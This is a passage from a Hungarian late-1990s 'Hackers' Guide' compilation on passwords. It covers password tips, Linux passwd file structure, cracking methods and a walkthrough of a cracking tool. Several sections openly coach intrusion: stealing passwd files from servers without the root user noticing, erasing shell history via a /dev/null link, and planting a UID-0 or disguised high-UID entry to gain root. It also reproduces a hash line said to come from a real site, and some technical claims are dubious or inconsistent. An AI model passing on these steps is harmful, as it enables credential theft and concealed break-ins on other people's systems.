szót megbolondítunk egy ilyen kisbetű/NAGYBETŰ trükközéssel, sokkal nehezebb<br />

lesz megfejteni. (Egy 8 karakteres jELszOiM jelszónak 17 év kell a megfejtéséhez!)<br />

2. A rövid 2-e betűs szavak nincsenek benne a szótárakban mind. És ha ezeket<br />

egymás után írva kreálunk jelszót, azt is húzós lesz megfejteni. Például: BeKiLeFel.<br />

Az általános iskolában tanult igekötőket egyszerűen egymás után írtam, de az első<br />

betűiket nagy betűvel. A megfejtéséhez a táblázat szerint 880 év kell.<br />

Ha van egy nagyon-nagyon gyakran használt jelszó, akkor arra érdemes a CAPS<br />

LOCK technikát alkamazni. Hogy mit is takar ez? Egyszerű: a jelszó megadásánál be<br />

kell kapcsolni a caps lock billentyűt. (Ne a shiftre tenyereljünk rá az feltűnőbb! =)) Ha<br />

ezt kombináljuk számokkal és kis és nagy betűkkel akkor meglepően jó eredményt<br />

érhetünk el. Például. MacskaJajj7%7. Itt látszik, hogy az "M" a "J" és a "%" betűnél<br />

nyomtunk SHIFT billentyűt. De ha így írjuk be: mACSKAjAJJ=5= akkor már kissé<br />

megváltozik az eredmény.<br />

Valamikor a jelszóhoz egy hacker eléggé extrém úton jut hozzá. Például egy<br />

felhasználó egy féle sémára épülő jelszórendszert használ és abból egyet<br />

megszerez. (PL: Gabor%AccExtra, vagy Gabor%AccSwi) innentől eléggé nagy a<br />

valószínűsége, hogy az internet elérési jelszava valami Gabor%AccSzolgaltato lesz<br />

vagy mondjuk a CS.HU-n lévő honlapjának a jelszava Gabor%AccCs lesz.<br />

Mit tudsz tenni?!!?<br />

• Először is használj jelszó tároló programot. Az ilyen jó program automatikusan<br />

generál új jelszavakat az elérhetőségeidnek, és így csak egy fő jelszót kell<br />

választanod és azt megjegyezned a többit a program végzi el helyetted. Amit<br />

ismerek az a PadLock IT de a régebbi verzióknál a program eltárolt jelszavait<br />

17 7


Hackers’ Guide<br />

még egy óvodás is vissza bírta fejteni... =) Szóval inkább nem ajánlok ilyen<br />

programot, mert nem ismerem mindet.<br />

• Készíts elég hosszú jelszavakat! Egy nagyon jól megépített és bekonfigurált<br />

rendszernél (PL: Linux) elég 4 karakteres jelszó is. De mondjuk már a vacak<br />

windoze-nak a 9 karakteres erősen javasolt. Fontos azonban megjegyezni,<br />

hogy sok rendszer maximálja a jelszavak hosszúságát és ez eléggé<br />

behatárolja a jelszavaink bonyolult kialakítását.<br />

• Használj különböző karaktereket, és még kombináld össze más egyéb<br />

jelekkel is! PL: I$am@K! egy eléggé jó és egyszerű jelszónak tűnik. Az I am<br />

OK! ből lett kialakítva. Es van benne kis és nagy betű, és egyéb más karakter<br />

is.<br />

• Mindíg tartsd az emlékezetedben: A rendszerd megbízhatósága annyit ér mint<br />

a leggyengébb láncszemének megbízhatósága! Hiába van 20 karakter hosszú<br />

mindenféle bonyolult jelszavad ha azt a MS Word v7.0 -val használod. Ez<br />

esetben másodperc töredéke alatt fel leszel törve...<br />

Eredeti: SiRiUs Š. feb.-'99. TnX tO "Vitas"<br />

- H3XR00T -<br />

http://hexnet.hpage.<br />

net/<br />

************************************************************************************************<br />

A linux passwd file felépítése<br />

Mielőtt a vén rókák elkezdenének suxxolni le kell, hogy szögezzem, hogy ez a doksi<br />

a kezdőknek készült! Ők meg használják egészséggel! =) Itt főleg a shadowolt és a<br />

nem-shadowolt passwd fileok különbségéről lesz szó. Marha nagy... csak egy "x"<br />

vagy "*" =D<br />

Először is. A linux passwd filejai ezekben a könyvtárakban találhatóak valahol :<br />

/etc/passwd vagy az etc/shadow. Ezekhez ha hozzáférsz akkor kb az alábbi<br />

eredményt láthatod, ha nincsenek shadowolva a jelszavak: Az alábbi passwd file a<br />

CS.HU-ról lett leszedve. =)<br />

admin:aaKRsX3J.tvTU:webmaster@controlshift.hu:Webmaster:30/9/1999:never:top<br />

Nos nézzük mi mit jelent!<br />

admin: Ez a felhasználói név. Itt most admin. A névből ítélve valami nagy fejes<br />

lehet... =)<br />

aaKRsX3J.tvTU: Ez a furcsa karakterekből álló betűhalmaz a jelszó. No mielőtt<br />

mindenki vadul elkezdene telnetelni a szolgáltató 79-es portjára elárulom, hogy ez<br />

kódolt jelszó és még meg kell fejteni valami unix passwd törő proggyval, mondjuk a<br />

17 8


Hackers’ Guide<br />

John the Ripper -rel vagy a Cracker Jack stb... programokkal.<br />

:::::::: Az ezek után jövő kettőspontokkal és egyéb marhaságokkal amik köztük<br />

vannak azokkal ne folgalkozz! =)<br />

Kiegészítés: Valahol a jelszó után egy : -tal elválasztva van egy vagy több szám is.<br />

Pl: Így:<br />

admin:aaKRsX3J.tvTU:253:10:CSAdmin:/cs/admin/www:bin/sh<br />

Ilyen esetben az egyes mezők ezeket jelentik:<br />

Felhasználói nev: admin<br />

Kódolt jelszó: aaKRsX3J.tvTU<br />

Azonosító szám: 253<br />

Csoportazonosító: 10<br />

GCOS mező: CSAdmin<br />

Home könyvtár: /cs/admin/www<br />

Kezdeti shell: /bin/sh<br />

No igen. De már hallom is a kérdést, hogy "én is szereztem egy ilyen passwd file-t de<br />

nem egészen ilyen formátumú...". Ha ez az eset áll fent akkor te valószínűleg egy<br />

shadowed passwd file-t szereztél meg. (Vagy ha nem akkor kérdezd meg a<br />

rendszergazdát, hogy mégis ő tudja-e, hogy milyen passwd file-t szereztél meg tőlük<br />

=)))) Hogy is néz ki ez valójában?:<br />

root:x:0:0:root:/root:/bin/bash<br />

Mint látható, sokkal rövidebb és a krixkrax karaktereket felváltotta egy x (szokott * is<br />

lenni). Nézzük meg, hogy ebben a felállásban mi micsoda:<br />

root: Ez még mindíg az a felhasználói név amire minden hacker/cracker/istentudjami<br />

áhítozik. =D<br />

x: Hoppááááááááá. Mivel a passwd file shadowolva van ezért a rejtjelezett jelszót<br />

felváltotta egy "x" karakter.<br />

root:/root:/bin/bash: Ez elvileg a shell mit az user használhat, kaphat. =I<br />

- H3XR00T -<br />

http://hexnet.hpage.net/<br />

************************************************************************************************<br />

Jelszófeltörés<br />

17 9


Hackers’ Guide<br />

Nnna........! Jelszó fejtő programot tettem ide. Unixhoz (szerintem) nem sokan<br />

értenek, ezért azt kihagyom. Ez a cain prg relativ lassú, de sok mindent tud.<br />

Indulásnak jó lesz. Win95/98 alatt műxik.<br />

Pár szó a titkositásról, hogy legyen fogamad arról amit csinálsz. Talán az első hires<br />

alkalmazója Julius Ceasar volt. Innen ered a neve is a Ceasar féle titkositásnak(a<br />

technologiára nem térnék ki). A mostanában használt módszer a DES (Data<br />

Encyption Standard), de van még ezer féle. A módszer a következő: egy 64 bites<br />

nyilt szöveget 64 bites titkositott szöveggé alakit, egy 56 bites kulcs segitségével. Az<br />

érzékelhetőség kedvéért csináltam egy ábrát is.<br />

A felcseréléseket a P , a helyettesitéseket az S doboz végzi. A P doboz nem más,<br />

mint egy 8 be és kimenelelű áramkör egy bemenő paraméter által meghatátozott<br />

össze-vissza kötött ki és bemenetelekkel, azaz a bemeneti 8 bit fecserélésével allitja<br />

elő a 8 bites kimenetet. Az S doboz a bemenetére adott 3 bit nyilt szöveget alakitja át<br />

3 bit titkos szöveggé. Az első lépésben a kulcstól független felcserélés történik, mig<br />

az utolsónál ennek a forditottja. Itt az első 32 bitet felcserélik az utolsó 32-vel. A<br />

köztük lévő 16 fokozat ugyanigy műxik, de a kulcs más-más része határozza meg az<br />

alkalmazott P, S dobozok adott felépitését. Ha ezt az ember felirja logikai<br />

fügvényekkel, akkor az alapján készithető egy (elvi) titkosito prg. Az okosok azt<br />

mondják, hogy az nem jó, amit pár év alatt vissza lehet fejteni. Különbözö cégek<br />

mikor piacra dobnak 1-1 ilyent, altalában sikerdij üti a markát annak aki vissza fejti a<br />

holmit.<br />

************************************************************************************************<br />

Jelszavak törése<br />

A jelszavakat általában a következo módszerrel titkosítják: A jelszóból létrehoznak<br />

egy fix hosszúságú jelsorozatot, bizonyos hash nevezetu függvény(ek) segítségével.<br />

Minden különbözo jelszóhoz különbözo hash jelsorozat generálódik, a legkisebb<br />

változtatásnál is szinte az egész jelsorozat teljesen más lesz. Az algoritmust viszont<br />

nem lehet megfordítani, így ezzel a módszerrel nem kapjuk meg a jelszavakat, csak<br />

az egyik irányba muködik a dolog.<br />

18 0


Hackers’ Guide<br />

A jelszótöro progik muködése a következo: Eloállítják a kipróbálandó jelszóból a<br />

hash függvény segítségével a fix hosszúságú jelsorozatot, majd ezt hasonlítják<br />

össze a password fájlban lévo, jelszóval, amire szintén rá van eresztve a hash<br />

algoritmus. Ha megegyezik a két hash jelsorozat, akkor megtalálta a jelszót. Ha nem,<br />

akkor jöhet a következo lehetoség.<br />

A passwordök megfejtésére van néhány módszer, ezek a következok:<br />

brute force attack: Ez a legidoigényesebb megoldás, miszerint végigpróbáljuk az<br />

összes lehetséges megoldást. Eloször kezdjük a legrövidebb jelszavakkal : "a", "b",<br />

"c", ... "z", plussz még számok, illetve más speciális karakterek. Az átlag lamer<br />

emberek nem használnak ilyen "bonyolult" jelszavakat, de kivétel erosíti a szabályt,<br />

és különben is, cirka 26 lehetoség nem nagy durranás az esetleges több száz-ezer<br />

millió vagy milliárd lehetoséghez képest. Persze ha be van állítva, hogy legalább 6<br />

karakteres legyen a jelszó, akkor felesleges a rövidebbekkel futtatni a jelszótörot.<br />

Ezek után egyesével emeljük a jelszó hosszát, és így is kipróbáljuk az összes<br />

lehetoséget, a-tól z-ig. Elonye hogy így biztos hogy megtaláljuk a jelszót , hátránya<br />

az idoigényessége, egy jobb gépen is napokig/hetekig tarthat a törés, és ez nem a<br />

legjobb megoldás, ha a jelszavakat mondjuk kétnaponta váltogatják. Ilyen esetben<br />

nem valószínu, hogy ilyen egyszeru jelszavakat használnak, szinte biztos hogy van<br />

benne néhány nagybetu és szám is. Persze csak akkor kapjuk meg így a jelszót, ha<br />

a jelszótöro proginak megadtuk az összes olyan karaktert, ami elofordulhat a<br />

jelszóban. Pl.: a jelszó "aaaa3" akkor hiába futtatjuk úgy a progit, hogy próbálja végig<br />

az összes olyan jelszót, ami tartalmazza az a..z betuket.<br />

dictionary attack: Ennek a módszernek a hatékonysága csak az emberi lustaságtól<br />

függ, miszerint az emberek nagyrésze hétköznapi szavakat használ jelszóként (vagy<br />

éppen a keresztnevét, vagy más hasonló publikus adatok magáról), részben ezért,<br />

hogy el ne felejtse (lásd pl.: a feltört elenderes jelszavakat). Kell hozzá lehetoleg egy<br />

minél nagyobb szótárfájl, ami az adott nyelv szavaiból tartalmaz lehetoség szerint<br />

minél többet, esetleg még egy angol vagy német. A módszer lényege az, hogy a<br />

szótárfájl szavaiból egyesével eloállítják a kódolt jelszót, majd ezt hasonlítják össze a<br />

password fájlban találhatóakkal. Ezzel elég hamar lehet végezni, ajánlott hozzá egy<br />

minél nagyobb szótárfájl. (Egy fokkal "bonyolultabb" jelszóként szokták használni a<br />

szó visszafelé írt alakját.)<br />

hybrid attack: Ez az elobbi két lehetoség kombinálása, arra a tényre épül, hogy a<br />

felhasználók sokszor választanak olyan jelszót, ami egy sima szóból és egy-két<br />

egyéb karakterbol áll (pl.: zsuzsa45, kert12). Példának ismét csak álljanak itt az<br />

elenderes jelszavak. Ehhez is csak egy szótárfájl kell, meg lehetoleg olyan<br />

jelszótöro, ami ismeri ezt a lehetoséget. Ha nincs olyan, akkor az sem baj, írjunk mi<br />

egy kis progit, ami egy rendes szótárfájlban található minden egyes szóból elkészíti a<br />

hybrid attackes változatait, majd ezeket beleírja egy másik fájlba. A jelszótörot ezek<br />

után már csak a hybrid szavakat tartalmazó - jóval nagyobb - jelszó fájllal kell futtatni.<br />

Ez a megoldás még mindig sokkal gyorsabban vezethet eredményhez, mint a brute<br />

force attack. A hatalmas hybrid szótárt esetleg fel lehet darabolni több gép között, így<br />

párhuzamosítva a törést.<br />

Gyorsítási módszerek:<br />

Itt nem térek ki a grafikus felületek eroforrásigényeire, szerintem mindenki számára<br />

egyértelmu, hogy két ugyanolyan jól megirt program közül a karakteres felületü<br />

18 1


Hackers’ Guide<br />

sokkal gyorsabb lehet, mint (esetleg windowsos) grafikus felületet használó társa.<br />

Persze a mai PII-es és Celeron proceszokon nemsok küldönbséggel fut a 16 bites<br />

kód, mint egy 200-as pentiumon, ezért ebbe a hibába sem szabad beleesni. Ha a<br />

próbálgatás gyorsan megy - pl.: másodpercenként több százezer kombináció<br />

végigpróbálása - akkor még véletlenül sem szabad minden kombinációt kiiratni a<br />

képernyore, elég csak százalékban, vagy mondjuk percenként az éppen aktuálisat,<br />

mivel ez is elég sok idot elvehet a törésbol.<br />

A brute force törésen azzal is lehet gyorsitani, hogy nem abc sorrendbe rakjuk a<br />

betüket, amelyek a jelszót alkotják, hanem elofordulási valószinüségüknek<br />

megfeleloen. Mindenki tudja, hogy a magyar szavakban a legtöbbször eloforduló<br />

magánhangzó az "e" betü, rakjuk ezt a lista elejére! (Tehát ezentúl nem<br />

"abcdefghij...z"-t adunk meg a programnak, hanem "eabcdfghij...z"-t.) Persze ezek<br />

minden szakmai szövegnél másként alakulnak, hiszen egy szakmai vagy egyéb<br />

terület, téma gyakran eloforduló szakkifejezései erosen befolyásolhatják ennek a<br />

listának az alakulásást.<br />

Bármelyik módszernek általában csak akkor van értelme, ha hamarabb sikerül<br />

megfejteni a jelszót, a következo jelszócsere idopontjánál. Ehhez nem árt egy gyors<br />

gép, vagy akár több is. Persze ha megint figyelembevesszük az emberi lustaságot,<br />

akkor - ha nincs is benne a jelszó semmilyen szótárban - érdemes lehet a lejárt<br />

passwordöket elrakni egy szótárfájlba, mert lehet hogy ezek "hybrid" változatai<br />

lesznek a következo jelszavak.<br />

Sun-Zero<br />

sun-zero@freemail.hu<br />

************************************************************************************************<br />

Jelszótörés<br />

Sokan kértétek, hogy erről a témában írjak részletesebben, mert már hú de sok<br />

jelszó fileotok van, de nem tudtok vele mit kezdeni. Ja igen és az is fontos volt, hogy<br />

érthető legyen. Na ennél érthetőben aztán nem tudom leírni, de aki ezek után is<br />

bénázik / nem ért valamit az már vessen magára! Nos itt van tehát közkívánatra.<br />

Először talán 1 kis ismertető a jelszófileról. A Hol találjuk a passwd fájlokat című<br />

cikkben le van írva, hogy hol találjuk őket. Mivel legtöbben erre voltatok kiváncsak a<br />

Linuxban álltalába a etc/passwd, vagy az ect/shadow fileban található.<br />

Íme így néz ki:<br />

root:Fpkd1rH58rmi:0:0:root:/root:/bin/bash<br />

daemon:*:1:1:daemon:/usr/sbin:/bin/sh<br />

bin:*:2:2:bin:/bin:/bin/sh<br />

sys:*:3:3:sys:/dev:/bin/sh<br />

sync:*:4:100:sync:/bin:/bin/sync<br />

18 2


Hackers’ Guide<br />

games:*:5:100:games:/usr/games:/bin/sh<br />

man:*:6:100:man:/var/catman:/bin/sh<br />

lp:*:7:7:lp:/var/spool/lpd:/bin/sh<br />

mail:*:8:8:mail:/var/spool/mail:/bin/sh<br />

news:*:9:9:news:/var/spool/news:/bin/sh<br />

uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh<br />

proxy:*:13:13:proxy:/bin:/bin/sh<br />

majordom:*:30:31:Majordomo:/usr/lib/majordomo:/bin/sh<br />

postgres:*:31:32:postgres:/var/postgres:/bin/sh<br />

www-data:*:33:33:www-data:/var/www:/bin/sh<br />

backup:*:34:34:backup:/var/backups:/bin/sh<br />

msql:*:36:36:Mini SQL Database Manager:/var/lib/msql:/bin/sh<br />

operator:*:37:37:Operator:/var:/bin/sh<br />

list:*:38:38:SmartList:/var/list:/bin/sh<br />

irc:*:39:39:ircd:/var:/bin/sh<br />

gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats/gnats-db:/bin/sh<br />

alias:*:70:65534:qmail alias:/var/qmail/alias:/bin/sh<br />

qmaild:*:71:65534:qmail daemon:/var/qmail:/bin/sh<br />

qmails:*:72:70:qmail send:/var/qmail:/bin/sh<br />

qmailr:*:73:70:qmail remote:/var/qmail:/bin/sh<br />

qmailq:*:74:70:qmail queue:/var/qmail:/bin/sh<br />

qmaill:*:75:65534:qmail log:/var/qmail:/bin/sh<br />

qmailp:*:76:65534:qmail pw:/var/qmail:/bin/sh<br />

nobody:*:65534:65534:nobody:/home:/bin/sh<br />

uservagyok:Hgjrhhr851h:1000:1000:GECOS,,,:/home/uservagyok:/bin/bash<br />

Na ebből nekünk 1enlőre a root:Fpkd1rH58rmi:0:0:root:/root:/bin/bash sor a<br />

fontos + a<br />

uservagyok:19S/JDGNuqnek:1000:1000:GECOS,,,:/home/uservagyok:/bin/bash<br />

sor.<br />

A többiek nem felhasználók ilyen userek, hogy mail + daemon+games + proxy stb...<br />

:)) nincsenek ezek a rendszer működéséhez szükséges operátori számlák, de ez<br />

most nem lényeg.<br />

Vizsgáljunk + jobban 1 sort:<br />

uservagyok:19S/JDGNuqnek:1000:1000:GECOS,,,:/home/uservagyok:/bin/bash<br />

uservagyok: felhasználó neve<br />

Hgjrhhr851h: felhasználó kódolt jelszava<br />

1000: felhasználő azonosítója<br />

1000: felhasználó csoport azonosítója<br />

GECOS: felhasználó neve<br />

/home/uservagyok: felhasználó alap könyvtára<br />

/bin/bash: felhasználó shellje<br />

A GCOS vagy GECOS az alapértelmezett ezt később + lehet változtatni a chfn<br />

paranccsal.<br />

A Hgjrhhr851h és a Fpkd1rH58rmi nem valós kódolt pw-k, bizonyos okok miatt (tehát<br />

ne próbáljátok visszafejteni).<br />

18 3


Hackers’ Guide<br />

Úgye a root a fontos, mert az a rendszergazda. Csakhogy álltalába a rendszergazda<br />

olyan kódot ad + amit sok időbe telik visszafejteni (számok, kis és nagybetű stb.) (DE<br />

nem mindig) a user meg álltalába bénát (értelmes szót stb.) Ez most végül is mind1.<br />

Úgyis észrevesszük, ha már 50 éve fejtünk vissza 1 pw filet és semmi:)))) Habár a<br />

UNIX rendszerekben a jelszó max. 8 karakter hosszú lehet, ez ne tévesszen +<br />

senkit, mert így is 1 [A-z 0-9..] -es és 8 karakter hosszú pw-t 1000000 jelszó/seces<br />

sebbel (1 jó pw törő progi kb. így dolgozik) is kb. 177.35 év +törni. No de ilyen pw-k<br />

nagyon nem gyakoriak. (nem a fasz nem) :)) Na elég a hülyeségből, majd ha<br />

máshogy nem megy, akkor user szintről feltornásszátok magatokat roottá, vagy<br />

nem:)<br />

Ja, majd el felejtettem akkor van szívás ha szemét, túlbuzgó rendszergazda ellenőrzi<br />

a userek béna pw-it, és +változtatja ilyen 177 éves szintűre. A kis kitérő után akkor<br />

kanyar vissza az eredeti témához.<br />

Indítsátok el Pw törő a progit. A Password crack és prg-k fejezetnél található (NT<br />

Unix Password Cracker).<br />

Ekkor ez a kép jön be. Na most részletességről lévén szó, clickeljetek rá szépen a<br />

Get Cracking gombra.<br />

Ezután ez a kép fogad titeket. Password file...tyúú ez mi lehet??<br />

Na itt most nem kell mást tenni, minthogy átnevezitek a pw filet *.txt-re. pl:<br />

passwd.txt. A browse-al + keresitek. Ha minden ok akkor kb. így kell kinéznie:<br />

18 4


Hackers’ Guide<br />

Output. Na most 1 nagyon nehéz dolog jön! :)) Készítsetek 1 tetszőleges nevű txt<br />

filet. pl: pwfejtés.txt. Ebbe a fileba kerül majd az eredmény (+fejtett pw-k) browse stb<br />

aztán enter.<br />

World list.. Ide kell berakni a netről vagy innen-onnan leszedett filet ami minél<br />

nagyobb annál jobb. Akkor van jelentősége, ha feltételezzük, hogy értelmes szó a<br />

pw. Így gyorsabb a fejtés. Ilyen filet mi is csinálhatunk. Nem nagyon használok ilyet.<br />

Ha ilyen nincs akkor a brute-force attack (nyers erő) módban kezd el működni, ami<br />

rules.<br />

18 5


Hackers’ Guide<br />

Ezután be lehet álltani, hogy számokat is nézzen (0-9) + symbols-t is lehet benyomni<br />

+ minden szart, de az lassítja a keresést, de biztosabb, hogy +találjuk a filet. Az a<br />

véleményem, hogy ha van a pw-ba symbol + hasonló szarok akkor az a pw már 177<br />

éves effektus lesz, :)) úgyhogy ne rakjuk be, mert úgyse várjuk ki 1 ilyen pw-nek a<br />

+fejtését. (a (0-9) azért hasznos!!!) Akkor, ha minden kész click a search-ra. Még<br />

nem vagyunk készen. Most jön a legbonyolultabb része az egésznek. Ki kel menni a<br />

frigóhoz és elővenni a Fantát, esetleg sört stb. és várni kell!!! :)))<br />

Ha vártunk eleget, akkor azt kell csinálni, hogy várjunk még 1 picit, és ha ekkor sincs<br />

semmi, akkor (frigóhoz ki) öntünk 1 kis vodkát is a fantába, mert már kezdünk<br />

ingerültté válni, és ez majd oldja a feszkót. (vodkanarancs rules 4ever)<br />

Utána még várunk 1 kicsit és utána nézzük meg mi történt. Ha sikerrel jártunk és<br />

találtunk 1 pw-t akkor ez a kép fogad minket:<br />

Igen, találtunk 1 pw-t. Ekkor 1000-rel megnézni a pwfejtés.txt-t és mondogatni, hogy<br />

remélem a root pw-t találta meg, remélem a root pw-t találta meg. Aztán bassza+<br />

csak a userét nyomta ki szöveg jön :)) Ha csak a userét akkor se csüggedjünk azzal<br />

is nagyon sok mindent lehet már csinálni! pl: várjunk tovább.:)) Álltalába amúgy is ezt<br />

löki ki előbb.<br />

Akkor vizsgáljuk a pwfejtés.txt-t.<br />

Cracking for 'C:\ntcrack\Pw.txt' melyik pw filet törtük<br />

-->Started: Wednesday,<br />

mikor csináltuk e remek tetett<br />

January 1, 2000 at 17:11:34<br />

--->Number of accounts: 5 mennyi betűből állt az account<br />

-->Crack method: Brute force Brute force (erről már volt szó)<br />

-->Using: Lowercase<br />

ezekről is<br />

alphabet, Digits.<br />

18 6


Hackers’ Guide<br />

minimális / maximális jelszó méret. (ezt magától állitja<br />

-->Min length: 3 Max length: 8<br />

a prg)<br />

-->Starting password: aaa honnan kezdte a prg a fejtést<br />

Account: uservagyok has uservagyok felhasználónak (user név) a jelszava<br />

password: user1<br />

user1 (*) Ez az 1ik amit kerestünk.<br />

-->Cracking stopped; found 1<br />

passwords.<br />

1 pw nél leálltunk (mi a ráknak több???) :))<br />

-->Cracking finished: mikor végeztünk (ez akkor lényeges ha több évig<br />

Wednesday, January 4, 2000 fejtettünk, és rájövünk felesleges volt a sok időt erre<br />

at 21:23:52<br />

kúrni, mert addigra megváltoztatták) :))<br />

-->Last password tried: uxrg utolsó próbált pw<br />

* igazából nem ezt a pw-t kaptam<br />

Ja még 1 fontos dolgok. Hasonlitsuk még 1* össze azt a két sort:<br />

root:Fpkd1rH58rmi:0:0:root:/root:/bin/bash<br />

uservagyok:Hgjrhhr851h:1000:1000:GECOS,,,:/home/uservagyok:/bin/bash<br />

Akkor most nézzük meg miben tér el az 1ik sor a másiktól?? Hát abban, hogy a<br />

szemét rootnak a felhasználó azonosítója 0 és a felhasználó csoport azonosítója is<br />

0. Hát igen, ha neked is ez lenne a nevet mellet, akkor te is root lennél. Namost:)) Ez<br />

1 kicsit eltér a témától. De most már mind1, ha belekezdtem. Ha valamilyen<br />

módszerral tudsz írni a pw fileba az jó.(pl: sendmail módszer stb.., de erről<br />

részletesebben másik cikkben majd) És miért jó??? Hát azért, mert a root jelszavát<br />

nem tudod, de ha adott rendszerben Te user vagy akkor tudsz adni magadnak root<br />

jogokat. (a saját pw-det +csak tudod). DE, semmi esetre se és neki a fájlnak, és kezd<br />

el 0:0 gépelni, mert rá fogsz szívni.. Azért, mert az összes ellenőrző program (ha van<br />

ilyen a rendszeren) jelezni fog, hogy problem van. Arról nem is beszélve ha a<br />

root kiadja a finger parancsot akkor feltűnő lesz, hogy 2 root is van a rendszeren.....<br />

Ilyenkor legjobb azt csinálni, hogy megadod pl: ezt 262144:262144 Ez azért jó, mert<br />

2-nek magasabb hatványait +adva is root jogokat kapunk. Erre azonban már nem<br />

figyelnek a prg-k. Sőt, a finger parancs kiadása után is csak azt látja root, hogy 1<br />

sima user van bent. höhö ql. De ez max. 1-2 óráig/napig jó, mert ha belenéz a gazda<br />

a pw filebe látni fogja, hogy nem ok a systemben valami.....<br />

Hát akkor végeztünk is volna ezzel. 1 kis összefoglalás. A lényeget leírtam. A<br />

részletesség néhol a minőség rovására ment, abból a tekintetből, hogy néha már<br />

olyan részletes volt, hogy elröhögtem magam. (de ezzel nyaggattatok, hogy részletes<br />

legyen ám). A módszer szerintem elmegy pl: 4-5 karakteres pw-ket amikben esetleg<br />

van szám is esetleg kis/nagy betű keverve 1 olyan 3-4 nap alatt +fejt. Legtöbbször a<br />

root jelszót is. A 7-8 karakteres speckó symbólokat is tartalmazó pw-k suxx. 1-2<br />

hétnél tovább nem érdemes fejteni 1 pw-t se!! mert az vagy több száz év alatt megy,<br />

de lehet hogy +van 1 hónap alatt, de addigra már lehet +változtatták. Szóval ez van<br />

srácok.....<br />

Dodge Viper<br />

http://w3.swi.hu/dviper<br />

************************************************************************************************<br />

18 7


Hackers’ Guide<br />

Passwd<br />

A passwd filet Linuxokon a /etc -be találhatjuk meg és ott a passwd file név alatt. Ha<br />

a serveren shadow található ne is próbálkozzunk azt letölteni mert ugysem lehet. Ha<br />

meg hozzá szeretnénk jutni vagy rootnak kell lennünk a serveren vagy megkell<br />

törnünk azt , de ha már megtudjuk törni akkor felesleges ezt a szöveget olvasni. :-)<br />

Ha úgy szeretnánk leszedni a passwd filet hogy a root ne vegye észre akkor<br />

próbáljuk meg átmásolni a home könyvtárunkba. Ha sikeresen átmásoltuk nézzuk<br />

meg hogy esetleg nincs e régebbi lementett passwd file amihez hozzá férhetünk,<br />

majd utána ezeket is másoljuk át. Ha mind ezzel meg vagyunk , nézzük át a passwd<br />

filet hogy használni tudjuk e. Ha minden rendben van érdemes ezeket átnevezni ,<br />

mert a root ha egyszer megnézi az ftp logokat érdekes dolgokat fog benne látni.<br />

Tehát ha pl: a login nevunk dudu akkor érdemes egy dudu.txt -re átnevezni oket mert<br />

az nem olyan feltüno. Ha esetleg több passwd fileunk is van akkor tar gzipeljuk oket<br />

össze így: tar -czvf dudu.tar.gz passwd* . Majd ha sikeresen letöltöttük akkor<br />

vizsgáljuk meg a .bash_history -nkat.. hogy az egészbol mi található benne. Ezt<br />

érdemes letörölni majd átlinkelni a /dev/null -ba , azt így: ln -s .bash_history /dev/null<br />

. Ezt érdemes a passwd lopás elott megcsinálni. Természetesen ezt az egészet csak<br />

akkor csináljuk meg ha a root nincs bent a serveren. Ha minden nyomot sikeresen<br />

eltüntettünk akkor már csak egy password crackerel kell megnézni a passwd filet mi<br />

mindent tudunk belole megtörni.<br />

Dudu<br />

************************************************************************************************<br />

Re: Passwd<br />

H3XR00T nem említett pár érdekességet a jelszófile-al kapcsolatban.<br />

Abban a szerencsétlen esetben, ha valakinek nincs a jelszava helyén semmiféle<br />

karakter (pl., kutya::666:666:Kiskutya:/home/kutyuli:/bin/bash ), az adott<br />

felhasználónévvel belépve nincs szükség jelszó használatára.<br />

A 0-s uid-al rendelkezô felhasználóknak rendszergazdai jogosultságaik vannak.<br />

Bizonyos rendszerek 2 magasabb hatványait is 0-s UID-nak kezelik - ilyen például a<br />

131072, aminek gazdája szintén élvezheti a rendszergazda jogait.<br />

"root:/root:/bin/bash: Ez elvileg a shell mit az user használhat, kaphat" - írta<br />

18 8


Hackers’ Guide<br />

H3XR00T. Az elsô "root" a felhasználónév az elöbbi részletben, a második a home<br />

könyvtár, és csak a harmadik shell.<br />

Eredeti: ViDe0<br />

- H3XR00T -<br />

http://hexnet.hpage.net/<br />

THX kiegészítésért ViDe0! =)<br />

************************************************************************************************<br />

PWL Hacking Tutorial<br />

PWL=PassWord List. A Windows alapú rendszerek ilyen kiterjesztésu fájlokban<br />

tárolják a jelszavakat, a gépen levo felhasználók felületéhez. És ez még nem<br />

minden, ezekben a fájlokban el van tárolva mindaz, amivel a kapcsolatba kerültél<br />

jelszó szinten, pl ha egy internetes laphoz kód kell (szabvány kódbekéro) akkor ez is<br />

ezekben a fájlokban tárolódik.<br />

A Win 95 OSR2 és a WIN98 PWL formátuma megegyezik, a Win NT más biztonsági<br />

modellt használ, az alap W95-é pedig elég szegényes... :-)<br />

Tehát a PWL-ben az alap felhasználó felülethez tartozó jelszó MELLETT további<br />

jelszavak is lehetnek, melynek típusai:<br />

Res. Type: Link<br />

Ez az említett internetes oldalra a jelszó<br />

Res. Type: Mail<br />

Helyi hálón a levelezoszerverhez a hozzáférés<br />

Res. Type: Dial<br />

Hát igen, ez a leghasználhatóbb, mégpedig a Dial-Up (Telefonos hálózat) jelszava<br />

Biztosan van még, ezekkel találkoztam.<br />

A továbbiakban a W95OSR2/W98 pwl állományait tekintsétek defaultnak, arról<br />

beszélek. :) Ha a pwl fájl csak a felhasználói felületet orzi, nincs benne eltárolva<br />

semmi pluszinformáció, akkor a mérete 688 bájt. Ha internetes jelszó szerzésére<br />

adtad a fejed, akkor az ilyen fájlokkal fölösleges foglalkoznod. Ha ennél nagyobb a<br />

méret, akkor biztos lehetsz benne, hogy van valamilyen ajándék a fájlban... :)<br />

Ezek a jelszavak természetesen kódolt formában találhatók meg a fájlban. Tehát egy<br />

szimpla F3-mal nem tudod megnézni ezeket az információkat. Ha plusz<br />

információkat (ezt nevezik cached passwords-nek) szeretnéd megtudni, akkor is<br />

18 9


Hackers’ Guide<br />

szükséged van a pwl-hez tartozó jelszóra, hiszen az ebbol álló/keletkezo kulccsal<br />

van kódolva az is. Ami még a PWL mellett szól, hogy a nyitójelszója (tehát nem a<br />

cached passwords) nem case sensitive, azaz nincs benne kis/nagybetu<br />

megkülönböztetés. Ennek akkor van nagy jelentosége, ha nekiállsz Brute Force-szal<br />

törni, de errol majd lejjebb.<br />

Kaptam egy kedves levelet, amiben a PWL törésnél jobb módszert mutattak... hehe...<br />

csak egy két apróság van benne buktatóul. Tehát mint említettem a plusz információ<br />

a lényeg. Ennek a megtudásához IS a pwl jelszavára van szükség. Létezik olyan<br />

program (pl.: pwlcrack) ami megmutatja a cached password-öket viszont az<br />

